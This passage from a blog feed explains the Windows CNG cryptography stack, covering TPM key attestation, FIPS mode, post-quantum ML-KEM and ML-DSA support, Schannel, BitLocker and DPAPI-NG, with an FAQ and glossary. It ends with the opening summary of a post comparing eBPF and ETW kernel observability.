    APPK[&quot;Application key -- generated in TPM via -- NCryptCreatePersistedKey&quot;]
    STMT[&quot;Attestation statement -- signed by AIK&quot;]
    CA[&quot;Enterprise CA (AD CS) -- verifies AIK chain -- and attestation&quot;]
    CERT[&quot;X.509 certificate -- issued to application key&quot;]&lt;pre&gt;&lt;code&gt;EK --&amp;gt; AIK
AIK --&amp;gt; STMT
APPK --&amp;gt; STMT
STMT --&amp;gt; CA
CA --&amp;gt; CERT
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The CNG-facing API for this is the property bag on a &lt;code&gt;NCRYPT_KEY_HANDLE&lt;/code&gt;. After creating the key, the application calls &lt;code&gt;NCryptGetProperty&lt;/code&gt; with &lt;code&gt;NCRYPT_KEY_ATTESTATION_PROPERTY&lt;/code&gt; (and friends) to retrieve the attestation blob. The CA receives the blob in the certificate request and validates it against Microsoft&apos;s published EK CA roots. The whole protocol fits inside the standard certificate-enrollment flow.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; A software KSP can promise that a key is non-exportable. A TPM KSP can prove it.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Throughput is the price. A typical TPM 2.0 chip performs single-digit RSA-2048 signatures per second. Pluton-based platforms are in the same neighborhood. Any architecture that wants to do a TPM signature on every HTTP request will fall over almost immediately. The TPM is the right home for one signature per session, per boot, or per logon -- not one per packet.Key migration between TPMs is essentially impossible by design. Replace a motherboard, and any keys that were sealed to the old TPM&apos;s Storage Root Key are gone. This is the same property that makes BitLocker safe against motherboard theft (the recovery key, escrowed elsewhere, is the only way back) and the same property that makes TPM-bound device identities a key-management headache during hardware refresh cycles.&lt;/p&gt;
&lt;p&gt;There is a deeper, more philosophical reason to use the TPM that the API does not advertise. Software keys are bounded by the kernel&apos;s process-isolation guarantees. Any kernel-level attacker, any user with &lt;code&gt;SeDebugPrivilege&lt;/code&gt;, or any code injected into &lt;code&gt;lsass.exe&lt;/code&gt; can in principle reach key material. The provably stronger bound -- keys that no OS-level code can ever read -- requires an off-CPU hardware boundary. CNG&apos;s own design notes acknowledge this when they say CNG &quot;is designed to be usable as a component in a FIPS level 2 validated system&quot; [@learn-microsoft-com-cng-features]: software-only isolation maps to FIPS 140-2 Levels 1 and 2; hardware boundaries are required for Level 3 and above.&lt;/p&gt;
&lt;h2&gt;6. FIPS 140 mode, compliance, and the one-bit toggle&lt;/h2&gt;
&lt;p&gt;There is a registry value at &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Lsa\FIPSAlgorithmPolicy\Enabled&lt;/code&gt;. When it is set to 1 (or when the equivalent Group Policy &quot;System cryptography: Use FIPS compliant algorithms for encryption, hashing, and signing&quot; is enabled), Schannel and CNG callers refuse to use algorithms that fall outside the FIPS-approved set. RC4 disappears. MD5 disappears. SHA-1 disappears for new signatures (though not for legacy verification). TLS suites that rely on any of those are removed from the negotiation list.&lt;/p&gt;
&lt;p&gt;The toggle is a runtime gate, not a code path. The underlying modules -- &lt;code&gt;bcryptprimitives.dll&lt;/code&gt; and &lt;code&gt;cng.sys&lt;/code&gt; [@learn-microsoft-com-140-windows11] -- are the same modules either way. They have been submitted to the Cryptographic Module Validation Program [@csrc-nist-gov-modules-search] and validated against the FIPS 140-2 standard [@csrc-nist-gov-2-final]. The toggle simply tells those modules that the calling environment expects FIPS-mode behavior, and the modules then refuse the non-approved algorithms.&lt;/p&gt;

A US federal certification program (Federal Information Processing Standard 140) that subjects a cryptographic module to laboratory testing and NIST review. Validated modules receive a public CMVP certificate. Federal agencies, FedRAMP/CMMC contractors, and most regulated industries can only use validated modules in approved configurations. FIPS 140-2 and the newer FIPS 140-3 differ mainly in test methodology and the standard&apos;s own ISO/IEC alignment.
&lt;p&gt;Two current Windows 11 certificate numbers are worth memorizing. CMVP certificate #4825 covers &lt;code&gt;bcryptprimitives.dll&lt;/code&gt; [@csrc-nist-gov-certificate-4825]. CMVP certificate #4766 covers &lt;code&gt;cng.sys&lt;/code&gt; [@csrc-nist-gov-certificate-4766], the kernel-mode primitives. Both are FIPS 140-2 Level 1 modules with a sunset date of September 21, 2026 under the CMVP&apos;s transition rules. Microsoft maintains the per-version FIPS validation portal for Windows 11 [@learn-microsoft-com-140-windows11], which lists the active certificates per build and the algorithms each one covers.&lt;/p&gt;
&lt;p&gt;The cadence mismatch is the open story here. Windows ships H1 and H2 feature updates roughly every six months. CMVP validation of a new build&apos;s primitives DLL and kernel module typically takes 12 to 24 months. Federal customers, FedRAMP-bound cloud tenants, and CMMC contractors cannot run a Windows build that does not have an active FIPS certificate covering its cryptographic modules. Microsoft submits 140-3 evidence for newer modules, but as of mid-2026 no public 140-3 certificate is visible on CMVP for the &lt;code&gt;bcryptprimitives.dll&lt;/code&gt; shipping in Windows 11 24H2.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Setting &lt;code&gt;FIPSAlgorithmPolicy\Enabled = 1&lt;/code&gt; is necessary for FIPS compliance, but not sufficient. The validated configuration also requires that Windows be a covered build (with an active certificate), that you avoid third-party crypto libraries that have not been validated, and that algorithm choices stay inside the per-certificate Approved Mode list. A Windows version without an active certificate is not in compliance even with the toggle on.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The toggle also does not change the SymCrypt implementations. AES-GCM is still AES-GCM. What changes is which APIs the caller is allowed to reach. From the application&apos;s point of view, the symptom of FIPS mode is &lt;code&gt;STATUS_NOT_SUPPORTED&lt;/code&gt; on &lt;code&gt;BCryptOpenAlgorithmProvider(L&quot;RC4&quot;, ...)&lt;/code&gt;. From an auditor&apos;s point of view, the symptom is the absence of any disallowed primitive call in the binary.&lt;/p&gt;
&lt;h2&gt;7. The post-quantum slide: ML-KEM, ML-DSA, and the agility test&lt;/h2&gt;
&lt;p&gt;The piece of CNG that earns its &quot;agility&quot; billing is the post-quantum transition.&lt;/p&gt;
&lt;p&gt;NIST opened the Post-Quantum Cryptography standardization process in 2016 and ran four rounds of public evaluation [@csrc-nist-gov-quantum-cryptography] before issuing the first final standards in August 2024. FIPS 203 standardizes ML-KEM (formerly CRYSTALS-Kyber), a module-lattice key encapsulation mechanism [@nvlpubs-nist-gov-fips-nistfips203pdf]. FIPS 204 standardizes ML-DSA (formerly CRYSTALS-Dilithium), a module-lattice digital signature algorithm [@csrc-nist-gov-204-final]. Microsoft Research had been working on lattice cryptography for years [@microsoft-com-quantum-cryptography], and the public CNG implementations followed quickly: Windows 11 24H2 ships ML-KEM and ML-DSA as first-class CNG algorithms.&lt;/p&gt;
&lt;p&gt;Here is the surprising part: the CNG API surface did not change. Adding ML-KEM was a matter of registering new algorithm identifier strings -- &lt;code&gt;BCRYPT_MLKEM_ALGORITHM&lt;/code&gt;, the parameter sets &lt;code&gt;BCRYPT_MLKEM_PARAMETER_SET_512&lt;/code&gt;, &lt;code&gt;BCRYPT_MLKEM_PARAMETER_SET_768&lt;/code&gt;, &lt;code&gt;BCRYPT_MLKEM_PARAMETER_SET_1024&lt;/code&gt; -- in the CNG algorithm-identifier registry [@learn-microsoft-com-algorithm-identifiers]. The opening dance for an ML-KEM key encapsulation looks exactly like the opening dance for an ECDH key agreement, except for the string.&lt;/p&gt;
&lt;p&gt;{`
// Mirrors the BCrypt pattern shown in the Microsoft sample
// &quot;Using ML-KEM with CNG for Key Exchange&quot;&lt;/p&gt;
&lt;p&gt;const hAlg = BCryptOpenAlgorithmProvider(&quot;ML-KEM&quot;, null, 0);&lt;/p&gt;
&lt;p&gt;const hKeyPair = BCryptGenerateKeyPair(hAlg, 0, 0);
BCryptSetProperty(hKeyPair, &quot;ParameterSetName&quot;, &quot;ML-KEM-768&quot;);
BCryptFinalizeKeyPair(hKeyPair, 0);&lt;/p&gt;
&lt;p&gt;const pubBlob   = BCryptExportKey(hKeyPair, &quot;MLKEMPUBLICBLOB&quot;);&lt;/p&gt;
&lt;p&gt;// Sender side: encapsulate to recipient&apos;s public key
const recipPub  = BCryptImportKeyPair(hAlg, &quot;MLKEMPUBLICBLOB&quot;, pubBlob);
const { ciphertext, sharedSecret: ssA } = BCryptEncapsulate(recipPub);&lt;/p&gt;
&lt;p&gt;// Recipient side: decapsulate with the matching private key
const ssB = BCryptDecapsulate(hKeyPair, ciphertext);&lt;/p&gt;
&lt;p&gt;// ssA === ssB
`}&lt;/p&gt;
&lt;p&gt;That code is structurally identical to a 2007-era ECDH session. The string changes, the blob format changes, and the wire-format sizes change considerably. ML-KEM ciphertexts at the 512, 768, and 1024 parameter sets are 768, 1088, and 1568 bytes respectively, with public keys of 800, 1184, and 1568 bytes per FIPS 203 [@csrc-nist-gov-203-final]. ML-DSA signatures at parameter sets 44, 65, and 87 are 2420, 3309, and 4627 bytes per FIPS 204 [@csrc-nist-gov-204-final]. For comparison, an ECDSA P-256 signature is 64 bytes and an X25519 public key is 32 bytes. The PQC blowup is roughly an order of magnitude, and that has knock-on consequences for every protocol that carries certificates or handshakes on the wire.&lt;/p&gt;

The reason ML-KEM matters before any large quantum computer exists is the harvest-now, decrypt-later attack: an adversary recording today&apos;s TLS sessions can decrypt them years from now if the long-lived key-exchange material was only protected by RSA or ECDH. Long-lived secrets transmitted over the wire today -- medical records, source code, government cables -- have a confidentiality lifetime measured in decades. The motivation for hybrid PQ key exchange is that you cannot un-record traffic.
&lt;p&gt;The wire-format problem is why most TLS-PQ deployments use hybrid groups: classical X25519 combined with ML-KEM-768, with the shared secret derived from both. If either component breaks, the other one still holds. The IETF draft &lt;code&gt;draft-kwiatkowski-tls-ecdhe-mlkem&lt;/code&gt; [@learn-microsoft-com-mlkem-examples] defines the &lt;code&gt;X25519MLKEM768&lt;/code&gt; group with IANA codepoint 0x11EC, and Chrome, Cloudflare, and AWS shipped support in production in 2024. OpenJDK JEP 527 [@openjdk-org-jeps-527] tracks the equivalent work for Java&apos;s TLS stack. Schannel in Windows 11 24H2 can negotiate ML-KEM through CNG, but Microsoft has not publicly committed to a default-on hybrid group at the Schannel layer as of mid-2026.&lt;/p&gt;

On a Windows 11 24H2 machine, the following PowerShell snippet asks CNG for its registered algorithms:&lt;pre&gt;&lt;code class=&quot;language-powershell&quot;&gt;[System.Security.Cryptography.CngAlgorithm]::new(&quot;ML-KEM&quot;)
Get-ChildItem &apos;HKLM:\SYSTEM\CurrentControlSet\Control\Cryptography\Configuration\Local\Default\0010&apos;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The first line forces a CngAlgorithm lookup. The second walks the configuration store. If the keys &lt;code&gt;ML-KEM&lt;/code&gt; and &lt;code&gt;ML-DSA&lt;/code&gt; appear, your kernel-mode and user-mode primitives are 24H2-current.
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;
&lt;p&gt;The bigger structural lesson is that two decades of &quot;cryptographic agility&quot; claims actually paid off. The PQC transition required a 24H2 update, not a CNG redesign.&lt;/p&gt;
&lt;h2&gt;8. Where CNG actually shows up: TLS, BitLocker, and friends&lt;/h2&gt;
&lt;p&gt;The argument for an OS-level cryptographic API stands or falls on what runs on top of it. Every modern Windows component that touches cryptography is a CNG consumer.&lt;/p&gt;

The Windows implementation of TLS and DTLS, exposed through the SSPI (Security Support Provider Interface). Schannel handles the TLS protocol state machine, certificate validation, and cipher-suite negotiation, then delegates the actual cryptography to BCrypt and NCrypt. The cipher-suite priority list and protocol-version controls are configured per Windows version, often via Group Policy.
&lt;p&gt;&lt;strong&gt;Schannel&lt;/strong&gt;, the Windows TLS stack, sits directly above CNG. The Schannel cipher-suite list is its own per-version object, documented at the Schannel cipher-suites portal [@learn-microsoft-com-in-schannel]. For TLS 1.2 and earlier, the order is administered via the registry key &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Cryptography\Configuration\Local\SSL\00010002&lt;/code&gt; (the &quot;Functions&quot; value) or the Group Policy &quot;SSL Cipher Suite Order.&quot; For TLS 1.3, the three suites (&lt;code&gt;TLS_AES_256_GCM_SHA384&lt;/code&gt;, &lt;code&gt;TLS_AES_128_GCM_SHA256&lt;/code&gt;, &lt;code&gt;TLS_CHACHA20_POLY1305_SHA256&lt;/code&gt;) are not user-orderable; Schannel hard-codes the priority. TLS 1.0 and TLS 1.1 are off by default in Windows 11 23H2 and later, per Microsoft&apos;s August 2023 deprecation announcement [@techcommunity-microsoft-com-windows-3887947].&lt;/p&gt;

flowchart TD
    App[&quot;Application -- (WinHTTP, HttpClient, browser, ...)&quot;]
    SSPI[&quot;SSPI / CredSSP layer&quot;]
    Schannel[&quot;Schannel -- protocol state machine -- cipher-suite negotiation&quot;]
    BCrypt[&quot;BCrypt -- AES-GCM, SHA-2/3, HKDF, RNG&quot;]
    NCrypt[&quot;NCrypt -- server cert private key sign -- client cert auth&quot;]
    KSP[&quot;KSP (Software / TPM / -- Smart Card / HSM)&quot;]&lt;pre&gt;&lt;code&gt;App --&amp;gt; SSPI
SSPI --&amp;gt; Schannel
Schannel --&amp;gt; BCrypt
Schannel --&amp;gt; NCrypt
NCrypt --&amp;gt; KSP
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;BitLocker&lt;/strong&gt; is the canonical NCrypt-and-TPM consumer. The Full Volume Encryption Key (FVEK) is generated and stored encrypted on disk. The Volume Master Key (VMK) wraps the FVEK and is itself wrapped by one or more &quot;protectors&quot;: the TPM, a recovery password, a startup PIN, a USB startup key. The TPM protector is an NCrypt-style operation against the Platform Crypto Provider, sealed to a set of Platform Configuration Register (PCR) measurements that capture the boot state. If anything in the early boot chain changes, the PCRs do not match, the TPM refuses to unwrap the VMK, and BitLocker falls back to recovery.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Authenticode&lt;/strong&gt;, the signature format on Windows binaries, is a NCrypt-driven workflow at signing time and a BCrypt-driven workflow at verification time. The Windows kernel verifies driver signatures, the Windows loader verifies binary signatures, and &lt;code&gt;WinVerifyTrust&lt;/code&gt; exposes the same machinery to applications. The hash algorithm in modern Authenticode is SHA-256, which means every signed executable on the system has a SHA-256 digest computed by BCrypt at some point during validation.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Credential Guard&lt;/strong&gt; runs the LSA isolated process (&lt;code&gt;lsaiso.exe&lt;/code&gt;) inside the Virtualization-Based Security trustlet boundary on systems with VBS enabled. Credential Guard does not replace CNG; it relocates the Microsoft Software KSP into a stronger isolation boundary. NTLM password hashes and Kerberos TGT session keys live inside that boundary, accessible only through the standard CNG calls dispatched into the trustlet.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Windows Hello for Business&lt;/strong&gt; uses the Platform Crypto Provider as the home for the user&apos;s gesture-protected authentication key. The biometric (or PIN) unlocks a key in the TPM; that key signs an attestation that is consumed by Azure AD or AD FS. The biometric never leaves the device.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;DPAPI and DPAPI-NG&lt;/strong&gt; are themselves built on CNG, and they deserve their own section because they are the easiest place to see how the layering pays off.&lt;/p&gt;

Schannel, BitLocker, EFS, Authenticode, Credential Guard, Windows Hello, DPAPI-NG, IPsec, SMB encryption, Kerberos PKINIT -- every modern Windows component is a CNG consumer.
&lt;h2&gt;9. DPAPI-NG: a worked example of the NCrypt model&lt;/h2&gt;
&lt;p&gt;The original Data Protection API (DPAPI), shipped with Windows 2000, was a per-user secret-protection mechanism. An application called &lt;code&gt;CryptProtectData&lt;/code&gt;, passed a blob of secret data, and got back an encrypted blob that only the same user on the same machine could later unwrap. The mechanism was anchored in the user&apos;s logon credentials, with a master key per user and a complex backup mechanism for password resets. It worked. It also locked the secret to a single machine, which became a problem the moment users started living on more than one device.&lt;/p&gt;
&lt;p&gt;DPAPI-NG, introduced in Windows 8 and Windows Server 2012, is the cloud-era rebuild. The CNG DPAPI documentation [@learn-microsoft-com-cng-dpapi] describes the three calls: &lt;code&gt;NCryptCreateProtectionDescriptor&lt;/code&gt;, &lt;code&gt;NCryptProtectSecret&lt;/code&gt;, and &lt;code&gt;NCryptUnprotectSecret&lt;/code&gt;. The protection descriptor is a small string that names who can unwrap the data. Examples include &lt;code&gt;SID=S-1-5-21-...&lt;/code&gt; for an Active Directory user or group, &lt;code&gt;LOCAL=user&lt;/code&gt; for the legacy single-user behavior, &lt;code&gt;WEBCREDENTIALS=...&lt;/code&gt; for a credential vault entry, and combinations connected by &lt;code&gt;AND&lt;/code&gt; or &lt;code&gt;OR&lt;/code&gt; operators.&lt;/p&gt;

flowchart LR
    Plain[&quot;plaintext secret&quot;] --&amp;gt; Protect[&quot;NCryptProtectSecret(descriptor, plain)&quot;]
    Desc[&quot;descriptor: -- SID=group GUID -- OR -- LOCAL=user&quot;] --&amp;gt; Protect
    Protect --&amp;gt; Blob[&quot;opaque blob&quot;]
    Blob --&amp;gt; Unprotect[&quot;NCryptUnprotectSecret(blob)&quot;]
    Unprotect -.-&amp;gt;|&quot;resolves descriptor -- via AD DC backup keys&quot;| AD[&quot;Active Directory DC -- (DPAPI backup keys)&quot;]
    Unprotect --&amp;gt; Out[&quot;plaintext secret -- on any authorized machine&quot;]
&lt;p&gt;The architectural win is that DPAPI-NG is just NCrypt with a particular protection-descriptor schema. Any KSP that can serve the key referenced by the descriptor can satisfy the unwrap. In an Active-Directory-joined environment, the AD domain controller&apos;s DPAPI backup keys allow any machine where the user (or any member of the named group) authenticates to recover the secret. The application that called &lt;code&gt;NCryptProtectSecret&lt;/code&gt; does not need to know about backup keys, replication topology, or recovery flows. It calls NCrypt; the router and the relevant KSP do the rest.&lt;/p&gt;
&lt;p&gt;This is the design payoff of the two-tier model. A new key-management capability (cross-machine recovery via AD-stored backup keys) becomes a new descriptor type, not a new API. The Windows team has used the same descriptor extensibility to add web-credential descriptors, container-bound descriptors, and the descriptors that protect Group Managed Service Account passwords. Each one is a private key-management concern; none of them broke the public API.The DPAPI-NG descriptor language is small enough to read in one sitting and powerful enough to express &quot;any member of this AD group, on any machine where that member can authenticate.&quot; That is the cloud-era access-control story that the original DPAPI never had.&lt;/p&gt;
&lt;h2&gt;10. Engineering takeaways: choosing the right tool&lt;/h2&gt;
&lt;p&gt;The decision tree for CNG usage in production code is short.&lt;/p&gt;

flowchart TD
    Q1{&quot;Need persistent -- private key?&quot;}
    Q1 -- No --&amp;gt; B[&quot;BCrypt -- (ephemeral key, pseudo-handle)&quot;]
    Q1 -- Yes --&amp;gt; Q2{&quot;Threat model?&quot;}
    Q2 -- &quot;Machine identity, -- hardware-rooted&quot; --&amp;gt; P[&quot;Microsoft Platform -- Crypto Provider -- (TPM / Pluton)&quot;]
    Q2 -- &quot;User-bound PKI, -- removable hardware&quot; --&amp;gt; S[&quot;Microsoft Smart Card KSP -- (PIV / virtual smart card)&quot;]
    Q2 -- &quot;High signing rate, -- regulated custody&quot; --&amp;gt; H[&quot;Third-party HSM KSP -- (YubiHSM / Luna / nShield)&quot;]
    Q2 -- &quot;Default, -- portable, fast&quot; --&amp;gt; SW[&quot;Microsoft Software KSP&quot;]
&lt;p&gt;For algorithm choice in mid-2026, the defensible defaults look like this. Symmetric encryption: ChaCha20-Poly1305 or AES-256-GCM. Hashing: SHA-256 or SHA-3 family. Signatures: ECDSA P-256 or P-384 today, with ML-DSA-65 in the back pocket for the inevitable hybrid transition. Key encapsulation: X25519 today, with X25519+ML-KEM-768 hybrid as soon as your peers support it. RSA-2048 only for legacy interoperability. RC4, 3DES, and SHA-1 only behind explicit deprecation policy, and only for verification of historical artifacts.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The hardest thing about CNG is not learning the API. It is choosing the right KSP. That single decision -- where the private key actually lives -- determines almost everything about your threat model, your throughput, your compliance posture, and your operational complexity.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;A few engineering rules survive in any setting.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Do not put persistent keys in BCrypt.&lt;/strong&gt; Every BCrypt key handle dies with the process. The architectural separation exists for a reason. If the key needs to survive a reboot, it belongs in NCrypt under a named KSP.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Do not assume the Software KSP.&lt;/strong&gt; Code that calls &lt;code&gt;NCryptOpenStorageProvider(NULL)&lt;/code&gt; ends up with whatever the default is. On a server with an HSM KSP configured as the default, this might be what you want; on a developer workstation, it might be the Microsoft Software KSP. Be explicit. Pass the name string. Test the negative case where the KSP you named is not registered.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Audit which KSP your certificates actually use.&lt;/strong&gt; A certificate enrolled with the Platform Crypto Provider behaves identically to a certificate enrolled with the Software KSP from &lt;code&gt;certutil&lt;/code&gt;&apos;s point of view. The difference is invisible until you ask. Use &lt;code&gt;certutil -store -v My&lt;/code&gt; to dump certificate properties, and look for the provider field.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Treat FIPS mode as a deployment fact, not a development toggle.&lt;/strong&gt; Code that works fine on a developer workstation can break in surprising ways on a FIPS-enabled production server. Run your CI on a FIPS-toggled image periodically. Catch the &lt;code&gt;STATUS_NOT_SUPPORTED&lt;/code&gt; returns before customers do.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Watch the PQC roadmap.&lt;/strong&gt; The ML-KEM and ML-DSA primitives are in 24H2. Hybrid TLS in Schannel is not on by default at the OS level as of mid-2026 (the most recent Microsoft public posture in the cipher-suite documentation does not yet list a default-on hybrid group), but downstream protocol updates will come. Code that uses the BCrypt and NCrypt patterns shown here picks up the new algorithms with a string change.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The single most useful CNG diagnostic command on a modern Windows system is &lt;code&gt;certutil -csptest&lt;/code&gt;, which enumerates registered providers and the algorithms each one claims to support. Run it before you suspect a configuration drift, not after.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The story of CNG is the story of two architectural bets that paid off. The first bet was that algorithms would keep arriving, so the API should be a registry of strings rather than a hard-coded set of functions. The second bet was that key storage was a separate concern from algorithm implementation, so the same primitives could run against software, TPM, smart cards, and HSMs without changing the application. In 2007 those bets looked over-engineered. In 2026, with ML-KEM shipping behind the same &lt;code&gt;BCryptEncapsulate&lt;/code&gt; call that an ECDH consumer would have used, they look like exactly the right design.&lt;/p&gt;
&lt;h2&gt;Frequently asked questions&lt;/h2&gt;

No. Microsoft&apos;s BCrypt is the `bcrypt.h` primitives header in CNG, providing AES, SHA, HMAC, RNG, and related primitives. The Provos-Mazieres bcrypt is a password-hashing function based on the Blowfish cipher, with no connection to Windows. The naming collision is unfortunate but firmly entrenched. When in doubt, BCrypt with a capital &quot;B&quot; usually means Microsoft&apos;s CNG header; lowercase bcrypt usually means the password-hashing function.

On Windows, yes. .NET&apos;s `System.Security.Cryptography` namespace wraps CNG directly: `RSACng`, `ECDsaCng`, `AesGcm`, `SHA256.HashData()`, `CngKey`. Go, Rust, and Python bindings exist as third-party crates and packages (the Rust `windows` crate exposes both BCrypt and NCrypt, for example). OpenSSL on Windows does not transparently use CNG; you need the `openssl-cng` provider or direct CNG calls if you want the OS-validated primitives to do the work.

Both can do RSA, ECDSA, and (in 24H2) ML-DSA signatures. The difference is lifetime. BCrypt key handles are ephemeral: they live in your process and disappear when it exits. NCrypt keys are persisted in a KSP and survive process exit, reboots, and (for AD-replicated descriptors via DPAPI-NG) the loss of a single machine. Use BCrypt for one-shot ephemeral operations (signing a single message, deriving a session key); use NCrypt for anything with a certificate attached or anything that has to be around tomorrow.

Possibly, depending on what algorithms it calls. Setting `HKLM\SYSTEM\CurrentControlSet\Control\Lsa\FIPSAlgorithmPolicy\Enabled = 1` causes CNG to refuse RC4, MD5, SHA-1 for new signatures, and a handful of other non-approved algorithms. Anything that relied on those returns `STATUS_NOT_SUPPORTED`. The fix is to switch to approved algorithms (AES, SHA-2 family, RSA, ECDSA, ML-KEM, ML-DSA), not to disable the toggle. The toggle is also necessary but not sufficient for FIPS compliance: you also need a Windows build with an active CMVP certificate covering the cryptographic modules.

As of mid-2026, the public Schannel documentation does not list a default-on hybrid group like `X25519MLKEM768`. The ML-KEM primitive is in CNG in 24H2, and Schannel can use it through the standard cipher-suite negotiation, but Microsoft has not publicly committed to enabling a hybrid group out of the box at the OS level. Chrome, Cloudflare, and AWS have already shipped hybrid PQ TLS in production at the application layer. Expect Schannel to follow once IETF standardization stabilizes and CMVP validation of the new modules catches up.

For a certificate in the user or machine store, run `certutil -store -v My` (or `My` replaced with the store name) and look at the &quot;Provider&quot; field of each certificate. `Microsoft Software Key Storage Provider` means the key is on disk under `%APPDATA%` or `%ALLUSERSPROFILE%`. `Microsoft Platform Crypto Provider` means the key lives inside the TPM (or Pluton). `Microsoft Smart Card Key Storage Provider` means the key is on a card. Third-party HSM KSPs will show the vendor&apos;s provider name. For a freshly-created key via `NCryptCreatePersistedKey`, the provider name you passed to `NCryptOpenStorageProvider` is the source of truth.

Because private keys do not live in the calling process. For the Microsoft Software KSP, key material lives in the LSA key-isolation process (`lsaiso.exe` under VBS, `lsass.exe` otherwise), and every operation that touches private bits has to cross that process boundary. The cost is around 30 to 100 microseconds per call. That is acceptable for signing or key derivation (operations that happen a handful of times per session); it would be punishing for bulk symmetric encryption. The architectural answer is to keep bulk crypto in BCrypt and let only the persistent-key operations pay the LRPC cost.
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;cng-architecture-bcrypt-ncrypt-ksps-and-windows-crypto&quot; keyTerms={[
  { term: &quot;CAPI (Cryptographic Application Programming Interface)&quot;, definition: &quot;The original Windows cryptographic API (1998-onward). Plug-in unit was the CSP. Superseded by CNG starting in 2007 but still present for backwards compatibility.&quot; },
  { term: &quot;CNG (Cryptography API: Next Generation)&quot;, definition: &quot;The Windows cryptographic API since Vista (2007). Two-tier split: BCrypt for primitives, NCrypt for key storage. The basis for all modern Windows cryptography.&quot; },
  { term: &quot;CSP (Cryptographic Service Provider)&quot;, definition: &quot;The CAPI-era plug-in unit. Monolithic DLL bundling algorithms, key storage, and FIPS posture.&quot; },
  { term: &quot;KSP (Key Storage Provider)&quot;, definition: &quot;The CNG-era plug-in unit for persistent key storage. Microsoft ships four; third parties ship many more. Selected by name string passed to NCryptOpenStorageProvider.&quot; },
  { term: &quot;Microsoft Software Key Storage Provider&quot;, definition: &quot;The default KSP. Stores DPAPI-wrapped keys on disk and dispatches operations through the LSA key-isolation process via LRPC.&quot; },
  { term: &quot;Microsoft Platform Crypto Provider&quot;, definition: &quot;The TPM-and-Pluton-backed KSP. Keys are generated and used inside the TPM chip; private bits never leave the silicon.&quot; },
  { term: &quot;TPM key attestation&quot;, definition: &quot;A three-key chain (EK -&amp;gt; AIK -&amp;gt; application key) that lets a CA verify a key was generated inside a real TPM. Supported by Active Directory Certificate Services since Windows Server 2012 R2.&quot; },
  { term: &quot;FIPS 140&quot;, definition: &quot;US federal certification program for cryptographic modules. Validated modules receive a public CMVP certificate. Windows 11&apos;s bcryptprimitives.dll holds CMVP certificate #4825, cng.sys holds #4766.&quot; },
  { term: &quot;ML-KEM (FIPS 203)&quot;, definition: &quot;Module-Lattice Key Encapsulation Mechanism. The NIST-standardized post-quantum KEM, formerly known as CRYSTALS-Kyber. Shipped in Windows 11 24H2.&quot; },
  { term: &quot;ML-DSA (FIPS 204)&quot;, definition: &quot;Module-Lattice Digital Signature Algorithm. The NIST-standardized post-quantum signature scheme, formerly known as CRYSTALS-Dilithium. Shipped in Windows 11 24H2.&quot; },
  { term: &quot;DPAPI-NG&quot;, definition: &quot;The CNG-era rebuild of the original Data Protection API. Uses NCrypt protection descriptors to bind protected data to AD principals (users, groups, web credentials) rather than to a single machine.&quot; },
  { term: &quot;SymCrypt&quot;, definition: &quot;Microsoft&apos;s open-source cryptographic implementation library. The actual workhorse behind BCrypt and NCrypt since Windows 10 version 1703 (2017).&quot; }
]} /&amp;gt;&lt;/p&gt;
</content:encoded><category>windows</category><category>cryptography</category><category>cng</category><category>tpm</category><category>pqc</category><category>fips</category><category>ksp</category><category>security</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>eBPF vs ETW: Two Generations of Kernel Observability</title><link>https://paragmali.com/blog/ebpf-vs-etw-two-generations-of-kernel-observability/</link><guid isPermaLink="true">https://paragmali.com/blog/ebpf-vs-etw-two-generations-of-kernel-observability/</guid><description>Why Windows ETW emits events and Linux eBPF computes them -- and what eBPF-for-Windows reveals about the convergence of two operating systems.</description><pubDate>Sat, 16 May 2026 00:00:00 GMT</pubDate><content:encoded>
**ETW (Windows 2000) is event emission only.** Per-CPU lock-free ring buffers, manifest-defined providers, kernel-mediated dispatch. Sessions filter by provider, keyword, and level; every enabled event is fully serialized and crosses the kernel/user boundary.&lt;p&gt;&lt;strong&gt;eBPF (Linux 2014) inverts the model.&lt;/strong&gt; The consumer ships verified bytecode into the kernel; programs filter and aggregate at the hook site before any data crosses the boundary. JIT-compiled, with hooks across kprobe, uprobe, tracepoint, XDP, TC, and LSM.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The verifier is the trust boundary -- and the catch.&lt;/strong&gt; Rice&apos;s theorem says no in-kernel verifier can be simultaneously sound, complete, and decidable. Linux&apos;s verifier trades soundness in the corner cases (CVE-2023-2163 and three predecessors); PREVAIL (the verifier used by eBPF-for-Windows) trades completeness more heavily for stronger formal grounding.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;eBPF-for-Windows is the first cross-OS-portable kernel-observability primitive.&lt;/strong&gt; PREVAIL verifies in user mode, &lt;code&gt;bpf2c&lt;/code&gt; transliterates verified bytecode to C, MSVC compiles to a signed &lt;code&gt;.sys&lt;/code&gt; driver. Networking-subset hooks only as of 2026; full kprobe-equivalent coverage is the work in progress.
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;
